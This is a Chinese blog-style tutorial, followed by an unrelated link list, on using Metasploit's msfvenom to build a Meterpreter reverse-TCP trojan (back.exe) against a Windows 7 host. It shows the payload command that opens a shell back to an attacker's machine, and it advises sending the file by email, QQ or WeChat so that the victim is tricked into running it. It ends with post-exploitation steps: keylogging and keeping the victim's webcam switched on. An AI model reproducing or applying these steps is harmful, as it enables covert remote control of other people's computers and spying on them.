当前位置: 首页 > news >正文

利用msf生成木马控制win7

第一步:扫描win系统有哪些开放端口

发现目标主机 192.168.10.130 上的三个TCP端口处于开放状态:

  • 135/tcp:运行 Microsoft RPC 服务
  • 139/tcp:运行 NetBIOS-SSN 服务
  • 445/tcp:运行 Microsoft-DS (Directory Services) 服务

第二步:生成木马

在Kali Linux中使用Metasploit的msfvenom工具生成一个Windows平台的Meterpreter反向TCP shell载荷

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机IP lport=自己设定不被占用端口号 -f 生成文件类型 -o 输出保存位置

表实验后续 参数解释

参数

含义

-p windows/meterpreter/reverse_tcp

指定要生成的Payload类型为Windows平台的Meterpreter反向TCP shell。以便与Kali Linux上的攻击者建立反向TCP连接

lhost=192.168.0.103

设置要连接回的IP地址,即指定Meterpreter shell将连接的IP地址

lport=4444

设置连接的端口号,即指定Meterpreter shell将使用的本地端口

-f exe

指定生成的文件格式为可执行文件(exe)

-o back.exe

指定输出文件的名称为back.exe

第三步:传播木马

通过邮件、QQ、微信发送给对方,诱听对方运行木马。

在把back.exe拖拽到受害者的主机上(win7如果不能粘贴外来文件,就把虚拟机中的VMware Tools打开安装就行)

就可以实现外来文件的粘贴复制了

第四步:接下来我们打开监听功能

第五步:使用meterpreter继续后渗透

Ps进程获取

1)对键盘输入(记事本)进行监控

2)控制对方摄像头

实施监控,一直打开摄像头

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 单位权中误差 详细介绍
  • 封装触底加载组件
  • 【Java并发编程一】八千字详解多线程
  • 【Day08】
  • python的统计分析库scipy.stats使用方法
  • SAP项目中沟通的几点总结
  • 科研小白成长记40——第三个五年计划
  • Excel文档的读取【2】
  • 3 html5之css新选择器和属性
  • Python画笔案例-038 绘制齿形图
  • SSL 证书 | 免费获取与自动续期全攻略
  • 贝壳面试:什么是回表?什么是索引下推?
  • 华为-2017-测试工程师笔试试卷
  • 【网络】UDP协议的简单使用
  • Python实现读取Excel数据详细教学版
  • 《深入 React 技术栈》
  • 【EOS】Cleos基础
  • 2017-08-04 前端日报
  • ES6--对象的扩展
  • Go 语言编译器的 //go: 详解
  • iOS筛选菜单、分段选择器、导航栏、悬浮窗、转场动画、启动视频等源码
  • js操作时间(持续更新)
  • Map集合、散列表、红黑树介绍
  • MyEclipse 8.0 GA 搭建 Struts2 + Spring2 + Hibernate3 (测试)
  • Python十分钟制作属于你自己的个性logo
  • Python语法速览与机器学习开发环境搭建
  • 分布式任务队列Celery
  • 近期前端发展计划
  • 每个JavaScript开发人员应阅读的书【1】 - JavaScript: The Good Parts
  • 如何优雅的使用vue+Dcloud(Hbuild)开发混合app
  • 深入浅出Node.js
  • 腾讯视频格式如何转换成mp4 将下载的qlv文件转换成mp4的方法
  • ### Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLTr
  • #if等命令的学习
  • (安卓)跳转应用市场APP详情页的方式
  • (附源码)计算机毕业设计ssm电影分享网站
  • (一) storm的集群安装与配置
  • (转)socket Aio demo
  • .NET Core 2.1路线图
  • .NET 设计一套高性能的弱事件机制
  • .NET 依赖注入和配置系统
  • .Net 中Partitioner static与dynamic的性能对比
  • .NET(C#) Internals: as a developer, .net framework in my eyes
  • .Net多线程Threading相关详解
  • .NET开源全面方便的第三方登录组件集合 - MrHuo.OAuth
  • .sdf和.msp文件读取
  • @param注解什么意思_9000字,通俗易懂的讲解下Java注解
  • []利用定点式具实现:文件读取,完成不同进制之间的
  • [AIR] NativeExtension在IOS下的开发实例 --- IOS项目的创建 (一)
  • [ai笔记4] 将AI工具场景化,应用于生活和工作
  • [Algorithm][动态规划][两个数组的DP][正则表达式匹配][交错字符串][两个字符串的最小ASCII删除和][最长重复子数组]详细讲解
  • [C/C++]数据结构----顺序表的实现(增删查改)
  • [C++] 容器适配器:深入理解Stack与Queue的底层原理
  • [C++数据结构](22)哈希表与unordered_set,unordered_map实现
  • [CISCN2019 华东南赛区]Web11